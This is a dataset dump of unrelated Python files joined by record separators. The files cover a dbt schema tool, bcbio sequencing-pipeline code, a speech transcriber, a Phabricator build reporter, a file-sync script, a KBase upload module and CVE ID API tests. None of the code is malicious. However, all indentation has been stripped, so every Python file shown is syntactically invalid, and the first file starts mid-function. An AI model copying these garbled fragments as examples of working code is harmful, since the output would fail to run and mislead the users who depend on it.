# Consider all columns "undocumented" so that inheritance is not selective
undocumented_columns = database_columns
# Engage
n_cols_added = 0
n_cols_doc_inherited = 0
n_cols_removed = 0
if len(missing_columns) > 0 or len(undocumented_columns) or len(extra_columns) > 0:
schema_file = self.yaml.load(schema_path.current)
(
n_cols_added,
n_cols_doc_inherited,
n_cols_removed,
) = self.update_schema_file_and_node(
missing_columns,
undocumented_columns,
extra_columns,
node,
schema_file,
)
if n_cols_added + n_cols_doc_inherited + n_cols_removed > 0:
# Dump the mutated schema file back to the disk
if not self.dry_run:
self.yaml.dump(schema_file, schema_path.current)
logger().info(":sparkles: Schema file updated")
# Print Audit Report
n_cols = float(len(database_columns))
n_cols_documented = float(len(documented_columns)) + n_cols_doc_inherited
perc_coverage = (
min(100.0 * round(n_cols_documented / n_cols, 3), 100.0)
if n_cols > 0
else "Unable to Determine"
)
logger().info(
AUDIT_REPORT.format(
database=node.database,
schema=node.schema,
table=node.name,
total_columns=n_cols,
n_cols_added=n_cols_added,
n_cols_doc_inherited=n_cols_doc_inherited,
n_cols_removed=n_cols_removed,
coverage=perc_coverage,
)
)
@staticmethod
def remove_columns_not_in_database(
extra_columns: Iterable[str],
node: ManifestNode,
yaml_file_model_section: Dict[str, Any],
) -> int:
"""Removes columns found in dbt model that do not exist in database from both node and model simultaneously
THIS MUTATES THE NODE AND MODEL OBJECTS so that state is always accurate"""
changes_committed = 0
for column in extra_columns:
node.columns.pop(column, None)
yaml_file_model_section["columns"] = [
c for c in yaml_file_model_section["columns"] if c["name"] != column
]
changes_committed += 1
logger().info(":wrench: Removing column %s from dbt schema", column)
return changes_committed
def update_undocumented_columns_with_prior_knowledge(
self,
undocumented_columns: Iterable[str],
node: ManifestNode,
yaml_file_model_section: Dict[str, Any],
) -> int:
"""Update undocumented columns with prior knowledge in node and model simultaneously
THIS MUTATES THE NODE AND MODEL OBJECTS so that state is always accurate"""
knowledge = self.get_node_columns_with_inherited_knowledge(node)
inheritables = ("description", "tags", "meta")
changes_committed = 0
for column in undocumented_columns:
prior_knowledge = knowledge.get(column, {})
progenitor = prior_knowledge.pop("progenitor", "Unknown")
prior_knowledge = {k: v for k, v in prior_knowledge.items() if k in inheritables}
if not prior_knowledge:
continue
if column not in node.columns:
node.columns[column] = ColumnInfo.from_dict({"name": column, **prior_knowledge})
else:
node.columns[column].replace(kwargs={"name": column, **prior_knowledge})
for model_column in yaml_file_model_section["columns"]:
if model_column["name"] == column:
model_column.update(prior_knowledge)
changes_committed += 1
logger().info(
":light_bulb: Column %s is inheriting knowledge from the lineage of progenitor (%s)",
column,
progenitor,
)
logger().info(prior_knowledge)
return changes_committed
@staticmethod
def add_missing_cols_to_node_and_model(
missing_columns: Iterable,
node: ManifestNode,
yaml_file_model_section: Dict[str, Any],
) -> int:
"""Add missing columns to node and model simultaneously
THIS MUTATES THE NODE AND MODEL OBJECTS so that state is always accurate"""
changes_committed = 0
for column in missing_columns:
node.columns[column] = ColumnInfo.from_dict({"name": column})
yaml_file_model_section.setdefault("columns", []).append({"name": column})
changes_committed += 1
logger().info(":syringe: Injecting column %s into dbt schema", column)
return changes_committed
def update_schema_file_and_node(
self,
missing_columns: Iterable[str],
undocumented_columns: Iterable[str],
extra_columns: Iterable[str],
node: ManifestNode,
yaml_file: Dict[str, Any],
) -> Tuple[int, int, int]:
"""Take action on a schema file mirroring changes in the node."""
# We can extrapolate this to a general func
noop = 0, 0, 0
if node.resource_type == NodeType.Source:
KEY = "tables"
yaml_file_models = None
for src in yaml_file.get("sources", []):
if src["name"] == node.source_name:
# Scope our pointer to a specific portion of the object
yaml_file_models = src
else:
KEY = "models"
yaml_file_models = yaml_file
if yaml_file_models is None:
return noop
for yaml_file_model_section in yaml_file_models[KEY]:
if yaml_file_model_section["name"] == node.name:
logger().info(":microscope: Looking for actions")
n_cols_added = self.add_missing_cols_to_node_and_model(
missing_columns, node, yaml_file_model_section
)
n_cols_doc_inherited = self.update_undocumented_columns_with_prior_knowledge(
undocumented_columns, node, yaml_file_model_section
)
n_cols_removed = self.remove_columns_not_in_database(
extra_columns, node, yaml_file_model_section
)
return n_cols_added, n_cols_doc_inherited, n_cols_removed
logger().info(":thumbs_up: No actions needed")
return noop
def get_raw_profiles(profiles_dir: Optional[str] = None) -> Dict[str, Any]:
import dbt.config.profile as dbt_profile
return dbt_profile.read_profile(profiles_dir or DEFAULT_PROFILES_DIR)
def uncompile_node(node: ManifestNode) -> ManifestNode:
"""Uncompile a node by removing the compiled_resource_path and compiled_resource_hash"""
return ParsedModelNode.from_dict(node.to_dict())
| StarcoderdataPython |
8187524 | import os
import string
import os.path as op
import sys
import shutil
from collections import namedtuple
try:
from seqcluster import prepare_data as prepare
from seqcluster import templates as template_seqcluster
from seqcluster.seqbuster import _create_counts, _read_miraligner, _tab_output
except ImportError:
pass
from bcbio.utils import file_exists, safe_makedir, move_safe, append_stem, get_bcbio_bin
from bcbio.provenance import do
from bcbio.distributed.transaction import file_transaction
from bcbio.log import logger
from bcbio.pipeline import datadict as dd
from bcbio.pipeline.sample import process_alignment
from bcbio.srna import mirdeep
from bcbio.rnaseq import spikein
from bcbio.srna import mirge
def run_prepare(*data):
"""
Run seqcluster prepare to merge all samples in one file
"""
out_dir = os.path.join(dd.get_work_dir(data[0][0]), "seqcluster", "prepare")
out_dir = os.path.abspath(safe_makedir(out_dir))
prepare_dir = os.path.join(out_dir, "prepare")
tools = dd.get_expression_caller(data[0][0])
if len(tools) == 0:
logger.info("You didn't specify any other expression caller tool."
"You can add to the YAML file:"
"expression_caller:[trna, seqcluster, mirdeep2]")
fn = []
for sample in data:
name = sample[0]["rgnames"]['sample']
fn.append("%s\t%s" % (sample[0]['collapse'], name))
args = namedtuple('args', 'debug print_debug minc minl maxl out')
args = args(False, False, 2, 17, 40, out_dir)
ma_out = op.join(out_dir, "seqs.ma")
seq_out = op.join(out_dir, "seqs.fastq")
min_shared = max(int(len(fn) / 10.0), 1)
if not file_exists(ma_out):
seq_l, sample_l = prepare._read_fastq_files(fn, args)
with file_transaction(ma_out) as ma_tx:
with open(ma_tx, 'w') as ma_handle:
with open(seq_out, 'w') as seq_handle:
logger.info("Prepare seqs.fastq with -minl 17 -maxl 40 -minc 2 --min_shared 0.1")
prepare._create_matrix_uniq_seq(sample_l, seq_l, ma_handle, seq_handle, min_shared)
for sample in data:
sample[0]["seqcluster_prepare_ma"] = ma_out
sample[0]["seqcluster_prepare_fastq"] = seq_out
return data
def run_align(*data):
"""
Prepare data to run alignment step, only once for each project
"""
work_dir = dd.get_work_dir(data[0][0])
out_dir = op.join(work_dir, "seqcluster", "prepare")
seq_out = op.join(out_dir, "seqs.fastq")
bam_dir = op.join(work_dir, "align")
new_bam_file = op.join(bam_dir, "seqs.bam")
tools = dd.get_expression_caller(data[0][0])
if not file_exists(new_bam_file):
sample = process_alignment(data[0][0], [seq_out, None])
bam_file = dd.get_work_bam(sample[0][0])
shutil.move(bam_file, new_bam_file)
shutil.move(bam_file + ".bai", new_bam_file + ".bai")
shutil.rmtree(op.join(bam_dir, sample[0][0]["rgnames"]['sample']))
for sample in data:
# sample[0]["align_bam"] = sample[0]["clean_fastq"]
sample[0]["cluster_bam"] = new_bam_file
if "mirdeep2" in tools:
novel_db = mirdeep.run(data)
return data
def run_cluster(*data):
"""
Run seqcluster cluster to detect smallRNA clusters
"""
sample = data[0][0]
tools = dd.get_expression_caller(data[0][0])
work_dir = dd.get_work_dir(sample)
out_dir = op.join(work_dir, "seqcluster", "cluster")
out_dir = op.abspath(safe_makedir(out_dir))
prepare_dir = op.join(work_dir, "seqcluster", "prepare")
bam_file = data[0][0]["cluster_bam"]
if "seqcluster" in tools:
gtf_file = dd.get_transcriptome_gtf(sample) if dd.get_transcriptome_gtf(sample) else dd.get_srna_gtf_file(sample)
sample["seqcluster"] = _cluster(bam_file, data[0][0]["seqcluster_prepare_ma"],
out_dir, dd.get_ref_file(sample),
gtf_file)
sample["report"] = _report(sample, dd.get_ref_file(sample))
if "mirge" in tools:
sample["mirge"] = mirge.run(data)
out_mirna = _make_isomir_counts(data, out_dir=op.join(work_dir, "mirbase"))
if out_mirna:
sample = dd.set_mirna_counts(sample, out_mirna[0])
sample = dd.set_isomir_counts(sample, out_mirna[1])
out_novel = _make_isomir_counts(data, "seqbuster_novel", op.join(work_dir, "mirdeep2"), "_novel")
if out_novel:
sample = dd.set_novel_mirna_counts(sample, out_novel[0])
sample = dd.set_novel_isomir_counts(sample, out_novel[1])
data[0][0] = sample
data = spikein.combine_spikein(data)
return data
def _cluster(bam_file, ma_file, out_dir, reference, annotation_file=None):
"""
Connect to seqcluster to run cluster with python directly
"""
seqcluster = op.join(get_bcbio_bin(), "seqcluster")
# cl = ["cluster", "-o", out_dir, "-m", ma_file, "-a", bam_file, "-r", reference]
if annotation_file:
annotation_file = "-g " + annotation_file
else:
annotation_file = ""
if not file_exists(op.join(out_dir, "counts.tsv")):
cmd = ("{seqcluster} cluster -o {out_dir} -m {ma_file} -a {bam_file} -r {reference} {annotation_file}")
do.run(cmd.format(**locals()), "Running seqcluster.")
counts = op.join(out_dir, "counts.tsv")
stats = op.join(out_dir, "read_stats.tsv")
json = op.join(out_dir, "seqcluster.json")
return {'out_dir': out_dir, 'count_file': counts, 'stat_file': stats, 'json': json}
def _report(data, reference):
"""
Run report of seqcluster to get browser options for results
"""
seqcluster = op.join(get_bcbio_bin(), "seqcluster")
work_dir = dd.get_work_dir(data)
out_dir = safe_makedir(os.path.join(work_dir, "seqcluster", "report"))
out_file = op.join(out_dir, "seqcluster.db")
json = op.join(work_dir, "seqcluster", "cluster", "seqcluster.json")
cmd = ("{seqcluster} report -o {out_dir} -r {reference} -j {json}")
if not file_exists(out_file):
do.run(cmd.format(**locals()), "Run report on clusters")
return out_file
def report(data):
"""Create a Rmd report for small RNAseq analysis"""
work_dir = dd.get_work_dir(data[0][0])
out_dir = op.join(work_dir, "report")
safe_makedir(out_dir)
summary_file = op.join(out_dir, "summary.csv")
with file_transaction(summary_file) as out_tx:
with open(out_tx, 'w') as out_handle:
print >>out_handle, "sample_id,%s" % _guess_header(data[0][0])
for sample in data:
info = sample[0]
group = _guess_group(info)
files = info["seqbuster"] if "seqbuster" in info else "None"
print >>out_handle, ",".join([dd.get_sample_name(info),
group])
_modify_report(work_dir, out_dir)
return summary_file
def _guess_header(info):
"""Add the first group to get report with some factor"""
value = "group"
if "metadata" in info:
if info["metadata"]:
return ",".join(map(str, info["metadata"].keys()))
return value
def _guess_group(info):
"""Add the first group to get report with some factor"""
value = "fake"
if "metadata" in info:
if info["metadata"]:
return ",".join(map(str, info["metadata"].values()))
return value
def _modify_report(summary_path, out_dir):
"""Read Rmd template and dump with project path."""
summary_path = op.abspath(summary_path)
template = op.normpath(op.join(op.dirname(op.realpath(template_seqcluster.__file__)), "report.rmd"))
content = open(template).read()
out_content = string.Template(content).safe_substitute({'path_abs': summary_path})
out_file = op.join(out_dir, "srna_report.rmd")
with open(out_file, 'w') as out_handle:
print >>out_handle, out_content
return out_file
def _make_isomir_counts(data, srna_type="seqbuster", out_dir=None, stem=""):
"""
Parse miraligner files to create count matrix.
"""
work_dir = dd.get_work_dir(data[0][0])
if not out_dir:
out_dir = op.join(work_dir, "mirbase")
out_novel_isomir = append_stem(op.join(out_dir, "counts.tsv"), stem)
out_novel_mirna = append_stem(op.join(out_dir, "counts_mirna.tsv"), stem)
logger.debug("Create %s count data at %s." % (srna_type, out_dir))
if file_exists(out_novel_mirna):
return [out_novel_mirna, out_novel_isomir]
out_dts = []
for sample in data:
if sample[0].get(srna_type):
miraligner_fn = sample[0][srna_type]
reads = _read_miraligner(miraligner_fn)
if reads:
out_file, dt, dt_pre = _tab_output(reads, miraligner_fn + ".back", dd.get_sample_name(sample[0]))
out_dts.append(dt)
else:
logger.debug("WARNING::%s has NOT miRNA annotated for %s. Check if fasta files is small or species value." % (dd.get_sample_name(sample[0]), srna_type))
if out_dts:
out_files = _create_counts(out_dts, out_dir)
out_files = [move_safe(out_files[0], out_novel_isomir), move_safe(out_files[1], out_novel_mirna)]
return out_files
else:
logger.debug("WARNING::any samples have miRNA annotated for %s. Check if fasta files is small or species value." % srna_type)
| StarcoderdataPython |
6478078 | import json
import os
import requests
import struct
import subprocess
import tempfile
import tempfile
import wave
from datetime import datetime
GOOGLE_SPEECH_API_KEY = "<KEY>"
GOOGLE_SPEECH_API_URL = "http://www.google.com/speech-api/v2/recognize" + \
"?client=chromium&lang={lang}&key={key}"
def speech_api_call(data,
language="en-US",
rate=16000,
retries=3,
api_key=GOOGLE_SPEECH_API_KEY):
for i in range(retries):
url = GOOGLE_SPEECH_API_URL.format(lang=language, key=api_key)
headers = {"Content-Type": "audio/x-flac; rate=%d" % rate}
try:
resp = requests.post(url, data=data, headers=headers)
except requests.exceptions.ConnectionError:
continue
for line in resp.content.split("\n"):
try:
line = json.loads(line)
transcript = line['result'][0]['alternative'][0]['transcript']
return transcript.capitalize()
except:
continue
def wav2flac(source_path):
temp = tempfile.NamedTemporaryFile(suffix='.flac')
command = ["ffmpeg", "-y", "-i", source_path,
"-ac", "1", "-ar", "16000",
"-loglevel", "error", temp.name]
subprocess.check_output(command)
return temp.read()
def write_wav(frames, sample_width, rate=16000, channels=1):
data = struct.pack('<' + ('h'*len(frames)), *frames)
tmp = tempfile.NamedTemporaryFile(suffix='.wav', delete=False)
wf = wave.open(tmp.name, 'wb')
wf.setnchannels(channels)
wf.setsampwidth(sample_width)
wf.setframerate(rate)
wf.writeframes(data)
wf.close()
return tmp.name
def transcribe(data, sample_width, rate):
filename = write_wav(data, sample_width, rate=rate)
flac_data = wav2flac(filename)
transcript = speech_api_call(flac_data)
os.remove(filename)
return transcript
def transcriber_thread(in_q, out_q, rate=44100):
try:
while True:
frames, width = in_q.get()
result = transcribe(frames, width, rate)
if result:
timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print('[{0}] {1}'.format(timestamp, result))
out_q.put(result)
except KeyboardInterrupt:
pass
except EOFError:
pass
| StarcoderdataPython |
9655174 | #!/usr/bin/python
import numpy;
import scipy;
import subprocess;
radarld="radar_ODR_5rlks";
width="1122";
wavelength=100.0*0.0565646;
cmd="\nrmg2mag_phs "+radarld+".unw "+radarld+".mag "+radarld+".phs "+width+"\n";
subprocess.call(cmd,shell=True);
file=open(radarld+".phs","rb");
phs=scipy.matrix(numpy.fromfile(file,numpy.float32,-1)).reshape(int(width),-1);
phs=phs*wavelength/4/numpy.pi;
file.close();
phs=scipy.matrix(phs,scipy.float32);
phs.tofile("adj_"+radarld+".phs");
exit();
| StarcoderdataPython |
8079066 | #!/usr/bin/env python
#
# Copyright (c) 2017-2018 The Bitcoin ABC developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Desciption:
# Quick and dirty script to read build output and report it to phabricator.
import sys
import os
import os.path
import urlparse
import json
from phabricator import Phabricator
import pygit2
from junitparser import TestCase, TestSuite, JUnitXml, Skipped, Error, Failure
def get_arcconfig():
# Find the .git dir
repoRoot = pygit2.discover_repository(".")
arcconfig_path = os.path.normpath(os.path.join(repoRoot, "../.arcconfig"))
assert os.path.isfile(arcconfig_path), ".arcconfig not found"
with open(arcconfig_path, "r") as f:
return json.loads(f.read())
def get_failures(junitfile):
"""Return a map of failures from a given junit report"""
ts = JUnitXml.fromfile(junitfile)
failures = {}
for case in ts:
failure_texts = []
for failure in case.iterchildren(Failure):
failure_texts.append(failure._elem.text.strip())
if len(failure_texts) != 0:
key = "{}.{}".format(case.name, case.classname)
failures[key] = "\n".join(failure_texts)
return failures
def get_commit_message():
"""Get the current commit message"""
repo = pygit2.Repository(pygit2.discover_repository("."))
commit_message = repo.head.peel().message
return commit_message
def get_revision(phab, commit_message):
"""Return a phabricator `revisionID` for the given commit body"""
diffInfo = phab.differential.parsecommitmessage(corpus=commit_message)
return diffInfo.fields['revisionID']
def get_author(phab, revisionID):
data_list = phab.differential.revision.search(
constraints={"ids": [revisionID]}).data
assert len(data_list) == 1, "Phabricator returned too many revisions"
diffdata = data_list[0]
authorPHID = diffdata['fields']['authorPHID']
return authorPHID
def create_task_body(buildUrl, revisionID, failures):
"""Generate a text body for a new task based on build failures."""
failure_blocks = []
# TODO: Fix this templating mess.
for failure, message in failures.iteritems():
failure_blocks.append("""{failure}
```
{message}
```
""".format(failure=failure, message=message))
if len(failure_blocks) == 0:
failure_blocks.append("See build log.")
task_body = """A [[ {url} | build ]] related to D{revision} has failed for the following reasons:
{reasons}
""".format(url=buildUrl, revision=revisionID, reasons="\n".join(failure_blocks))
return task_body
def create_task(phab, guiltyPHID, revisionID, task_body):
phab.maniphest.edit(transactions=[
{"type": "owner", "value": guiltyPHID},
{"type": "title", "value": "Revision D{} broke builds".format(
revisionID)},
{"type": "priority", "value": "unbreak"},
{"type": "description", "value": task_body.format(
revision=revisionID)}
])
def create_comment(phab, revisionID, build_status, buildUrl):
status_verb = "failed"
if build_status == "success":
status_verb = "passed"
msg = ""
if buildUrl:
msg = "This revision has {} [[{} | testing]].".format(
status_verb, buildUrl)
else:
msg = "This revision has {} testing.".format(status_verb)
phab.differential.revision.edit(transactions=[
{"type": "comment", "value": msg}
], objectIdentifier=revisionID)
def main(args):
if len(args) < 2:
print("Please provide a list of junit reports as command line arguments.")
sys.exit(1)
token = os.getenv("TEAMCITY_CONDUIT_TOKEN", None)
if not token:
print("Please provide a conduit token in the environment variable ""TEAMCITY_CONDUIT_TOKEN""")
sys.exit(1)
arcconfig = get_arcconfig()
phabricatorUrl = urlparse.urljoin(arcconfig['conduit_uri'], "api/")
buildUrl = os.getenv('BUILD_URL', '')
build_status = "success"
failures = {}
for arg in args:
# All inputs may not exist if the build fails prematurely
if not os.path.isfile(arg):
continue
if arg.endswith(".status"):
with open(arg, "r") as f:
build_status = f.read().strip()
elif arg.endswith(".xml"):
failures.update(get_failures(arg))
if len(failures) != 0:
build_status = "failure"
phab = Phabricator(host=phabricatorUrl, token=token)
phab.update_interfaces()
revisionID = get_revision(phab, get_commit_message())
authorPHID = get_author(phab, revisionID)
if build_status != "success":
task_body = create_task_body(buildUrl, revisionID, failures)
create_task(phab, authorPHID, revisionID, task_body)
create_comment(phab, revisionID, build_status, buildUrl)
if __name__ == "__main__":
main(sys.argv)
| StarcoderdataPython |
3590145 | <reponame>shimataro/syncfiles
#!/usr/bin/python
# coding: utf-8
""" Synchronize files
* Copy from newest file to others.
* Error when all files are not exist.
"""
import sys
import os
def main(scriptname, args):
""" main function
@param scriptname: script file name
@param args: command line arguments
@return: exit status
"""
if len(args) < 2:
usage(scriptname)
return os.EX_USAGE
return syncfiles(args)
def usage(scriptname):
""" display usage
@param scriptname: script file name
"""
command = os.path.basename(scriptname)
message = "Usage: {0} <file> <file> [<file> ...]".format(command)
print3(message, file=sys.stderr)
def syncfiles(filenames):
""" body
@param filenames: list of filenames to be synchronized
@return: exit status
"""
# newest file as master
filename_master = get_newest_filename(filenames)
if filename_master is None:
print3("Error: No files exist", file=sys.stderr)
return os.EX_NOINPUT
print3("Master file: {0}".format(filename_master))
for filename in filenames:
if file_same_contents(filename_master, filename):
continue
file_copy(filename_master, filename)
return os.EX_OK
def get_newest_filename(filenames):
""" get newest(last modified) filename
@param filenames: list of filenames
@return: newest file or None
"""
newest_filename = None
newest_mtime = -1
for filename in filenames:
try:
# compare mtimes
mtime = os.path.getmtime(filename)
if mtime <= newest_mtime:
continue
# update filename and mtime
newest_filename = filename
newest_mtime = mtime
except OSError:
pass
return newest_filename
def file_same_contents(filename1, filename2):
""" same contents?
@param filename1: filename 1
@param filename2: filename 2
@return: Yes/No
"""
import filecmp
if filename1 == filename2:
return True
try:
return filecmp.cmp(filename1, filename2)
except OSError:
return False
def file_copy(filename_src, filename_dst):
""" copy file and display message
@param filename_src: source filename
@param filename_dst: destination filename
"""
import shutil
shutil.copy(filename_src, filename_dst)
print3("Copied: {0} -> {1}".format(filename_src, filename_dst))
def print3(*objects, **params):
""" print function like Python3
@param objects: output objects
@param sep: separate string
@param end: end string
@param file: output file
"""
sep = params.get("sep", " ")
end = params.get("end", "\n")
file = params.get("file", sys.stdout)
file.write(sep.join(str(object) for object in objects))
file.write(end)
if __name__ == "__main__":
sys.exit(main(sys.argv[0], sys.argv[1:]))
| StarcoderdataPython |
8015987 | <reponame>alex-dsouza777/Python-Basics
#pip install virtualenv --> Installs the package
#virtualenv myprojectenv --> Creates a new venv
#.\myprojectenv\Scripts\activate.ps1
#pip freeze > requirements.txt --> Creates requirements. txt
#pip install –r requirements.txt --> Installs all packages from requirements.txt
import flask
import pandas as pd
import pygame | StarcoderdataPython |
49887 | <gh_stars>0
# -*- coding: utf-8 -*-
#BEGIN_HEADER
import logging
import os
import shutil
from Utils.mutantpooluploadUtilClient import mutantpooluploadUtil
from Utils.expsfileuploadUtilClient import expsfileuploadUtil
from Utils.barcodecountuploadUtilClient import barcodecountfileuploadUtil
from Utils.genetableuploadUtilClient import genetableuploadUtil
from Utils.fitnessmatrixuploadUtilClient import fitnessmatrixuploadUtil
from Utils.modeluploadUtilClient import modeluploadUtil
#from Utils.funcs import check_output_name
from installed_clients.KBaseReportClient import KBaseReport
from installed_clients.WorkspaceClient import Workspace
from installed_clients.DataFileUtilClient import DataFileUtil
from installed_clients.rbts_genome_to_genetableClient import rbts_genome_to_genetable
#END_HEADER
class poolfileupload:
'''
Module Name:
poolfileupload
Module Description:
A KBase module: poolfileupload
'''
######## WARNING FOR GEVENT USERS ####### noqa
# Since asynchronous IO can lead to methods - even the same method -
# interrupting each other, you must be *very* careful when using global
# state. A method could easily clobber the state set by another while
# the latter method is running.
######################################### noqa
VERSION = "0.0.1"
GIT_URL = ""
GIT_COMMIT_HASH = ""
#BEGIN_CLASS_HEADER
#END_CLASS_HEADER
# config contains contents of config file in a hash or None if it couldn't
# be found
def __init__(self, config):
#BEGIN_CONSTRUCTOR
self.callback_url = os.environ['SDK_CALLBACK_URL']
self.shared_folder = config['scratch']
self.ws_url = config['workspace-url']
logging.basicConfig(format='%(created)s %(levelname)s: %(message)s',
level=logging.INFO)
#END_CONSTRUCTOR
pass
def run_poolfileupload(self, ctx, params):
"""
This example function accepts any number of parameters and returns results in a KBaseReport
:param params: instance of mapping from String to unspecified object
'workspace_name' (str):,
'workspace_id' (int): e.g. 62550,
'genome_ref' (str): 'A/B/C'
'pool_file_type' (str): 'genes_table' or 'mutantpool' or 'barcodecount' or 'experiments' or 'model'
'description' (str): Free string
'sep_type': 'TSV' or 'CSV'
'protocol_type': fixed vocab
'staging_file_names' (list<str>): list<filenames>
'output_names' list<str>: List<Free string> - Correlate to staging_file_names
:returns: instance of type "ReportResults" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_poolfileupload
params['shared_folder'] = self.shared_folder
token = os.environ.get('KB_AUTH_TOKEN', None)
ws = Workspace(self.ws_url, token=token)
params['workspace_id'] = ws.get_workspace_info({'workspace': params['workspace_name']})[0]
params['ws_obj'] = ws
# genetable object (converts genome to gene table)
params['gt_obj'] = rbts_genome_to_genetable(self.callback_url)
params['username'] = ctx['user_id']
res_dir = os.path.join(self.shared_folder, "results")
os.mkdir(res_dir)
params['results_dir'] = res_dir
#params['output_name'] = check_output_name(params['output_name'])
# Checking basic params
if not 'sep_type' in params:
raise Exception("sep_type not in params.")
elif params['sep_type'] not in ["TSV", "CSV"]:
raise Exception(f"Did not recognize sep_type: {params['sep_type']}")
logging.info(params)
if 'RBTS_file_type' not in params:
raise Exception("Did not get param RBTS_file_type")
else:
pft = params['RBTS_file_type']
if pft in ['experiments', 'mutantpool', 'barcodecount', 'fitness_matrix', 'model']:
if params['genome_ref'] == "":
raise Exception(f"When uploading {pft} files you must reference a genome object.")
if "organism_scientific_name" in params and params["organism_scientific_name"] != "" and \
params["organism_scientific_name"] is not None and \
params["organism_scientific_name"] != "None":
logging.warning("When uploading anything besides a genes table, "
"do not provide the organism's name (under Advanced Inputs)."
f" Current name given: '{params['organism_scientific_name']}'."
" This new scientific name will not be used.")
if pft == 'mutantpool':
# requires genome_ref
pf_util = mutantpooluploadUtil(params)
result = pf_util.upload_mutantpool()
gene_table_fp = result["GenesTable_fp"]
shutil.move(gene_table_fp, res_dir)
elif pft == 'barcodecount':
if "protocol_type" not in params or params["protocol_type"] == "":
raise Exception("If uploading a barcodecount file, upload "
"protocol type as well (under Advanced)." + \
json.dumps(params))
if "mutantpool_ref" not in params or params["mutantpool_ref"] == "":
raise Exception("If uploading barcodecounts files, upload "
"related mutant pool as well (under Advanced).")
pcf_util = barcodecountfileuploadUtil(params)
result = pcf_util.upload_barcodecountfile()
elif pft == 'experiments':
expsf_util = expsfileuploadUtil(params)
result = expsf_util.upload_expsfile()
elif pft == 'fitness_matrix':
num_stage = len(params['staging_file_names'])
if not num_stage > 2:
raise Exception("When uploading a fitness matrix, "
" upload at least 2 files: the fitness scores "
" and the T-score files. Optionally "
" upload the strain fitness scores file."
" The fitness score TSV file should be "
" the first one, the t-score should be "
" the second, and the strain fitness 3rd. ")
elif num_stage > 3:
raise Exception("Cannot take more than 3 files for "
"this data type: Gene Fitness, T Scores"
", and Strain fitness scores.")
fitness_matrix_util = fitnessmatrixuploadUtil(params)
result = fitness_matrix_util.upload_fitnessmatrix()
else:
# model
modelf_util = modeluploadUtil(params)
result = modelf_util.upload_model()
elif pft == "genes_table":
if "organism_scientific_name" not in params or params["organism_scientific_name"] == "":
raise Exception("When uploading a genes table, you must provide the organism's scientific name (under Advanced Inputs).")
if "genome_ref" not in params or params["genome_ref"] == "":
raise Exception("When uploading a genes table, you must provide a genome object reference (under Advanced).")
gene_table_util = genetableuploadUtil(params)
result = gene_table_util.upload_genes_table()
else:
raise Exception(f"Did not recognize pool_file_type {pft} for upload")
text_message = "Finished uploading file \n"
if pft != "barcodecount":
text_message += "{} saved as {} on {}\n".format(result['Name'],
result['Type'], result['Date'])
else:
for pc_result in result:
text_message += "{} saved as {} on {}\n".format(pc_result['Name'],
pc_result['Type'], pc_result['Date'])
logging.info(text_message)
# Returning file in zipped format:-------------------------------
report_created = False
if len(os.listdir(res_dir)) > 0:
report_created = True
logging.info("res dir: " + ", ".join(os.listdir(res_dir)))
dfu = DataFileUtil(self.callback_url)
file_zip_shock_id = dfu.file_to_shock({'file_path': res_dir,
'pack': 'zip'})['shock_id']
dir_link = {
'shock_id': file_zip_shock_id,
'name': 'results.zip',
'label':'RBTS_UPLOAD_output_dir',
'description': 'The directory of outputs from uploading' \
+ 'RBTS table.'
}
report_params = {
'workspace_name' : params['workspace_name'],
'file_links':[dir_link],
"message": text_message
}
#Returning file in zipped format:------------------------------------------------------------------
report_util = KBaseReport(self.callback_url)
report_info = report_util.create_extended_report(report_params)
# ----------
if not report_created:
report = KBaseReport(self.callback_url)
report_info = report.create({'report': {'objects_created':[],
'text_message': text_message},
'workspace_name': params['workspace_name']})
output = {
'report_name': report_info['name'],
'report_ref': report_info['ref'],
}
#END run_poolfileupload
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_poolfileupload return value ' +
'output is not type dict as required.')
# return the results
return [output]
def status(self, ctx):
#BEGIN_STATUS
returnVal = {'state': "OK",
'message': "",
'version': self.VERSION,
'git_url': self.GIT_URL,
'git_commit_hash': self.GIT_COMMIT_HASH}
#END_STATUS
return [returnVal]
| StarcoderdataPython |
6433757 | <filename>automix/model/inputOutput/serializer/xmlSerializer.py
class XmlSerialiser(object):
@staticmethod
def xmlDeserialize(path):
"""
get a track from the SegmXML format: http://www.ifs.tuwien.ac.at/mir/audiosegmentation.html
"""
tree = ET.parse(path)
root = tree.getroot()
track = Track()
track.name = root.find('metadata').find('song').find('title').text
track.segments = [
Segment(segment.attrib['label'], start=segment.attrib['start_sec'], end=segment.attrib['end_sec'])
for segment in root.find('segmentation').iter('segment')
]
return track
| StarcoderdataPython |
12808588 | import copy
import datetime as dt
import json
import pytest
import requests
import time
import uuid
from src import env, utils
from src.utils import (assert_contains, ok_response_contains,
response_contains, response_contains_json)
CVE_ID_URL = '/api/cve-id'
cve_id = 'CVE-1999-0001'
#### GET /cve-id:id ####
def test_get_cve_id(org_admin_headers):
""" the first ID from 1999 should always exist """
res = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}/{cve_id}',
headers=org_admin_headers
)
ok_response_contains(res, cve_id)
def test_get_cve_id_bad_org_header(org_admin_headers):
""" unauthorized users can't get known IDs """
uid = str(uuid.uuid4())
tmp = copy.deepcopy(org_admin_headers)
tmp['CVE-API-ORG'] = uid
tmp['CVE-API-USER'] = uid
res = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}/{cve_id}',
headers=tmp
)
assert res.status_code == 401
assert res.reason == 'Unauthorized'
response_contains_json(res, 'error', 'UNAUTHORIZED')
def test_get_cve_id_id(org_admin_headers):
""" the id parameter must be a string """
res = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}/{cve_id}',
headers=org_admin_headers
)
assert isinstance (cve_id, str)
#### PUT /cve-id:id ####
def test_put_cve_id_id_state(org_admin_headers):
""" org admin cannot update id's state """
res = requests.put(
f'{env.AWG_BASE_URL}{CVE_ID_URL}/{cve_id}',
headers=org_admin_headers,
params={'state':'PUBLIC'}
)
assert res.status_code == 403
response_contains_json(res, 'error', 'SECRETARIAT_ONLY')
#### POST /cve-id ####
def test_post_cve_id_update_parameters(org_admin_headers):
""" org admins can update own information """
res = requests.post(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'amount': '10',
'batch_type': 'sequential',
'cve_year': f'{utils.CURRENT_YEAR}',
'short_name': org_admin_headers['CVE-API-ORG']
}
)
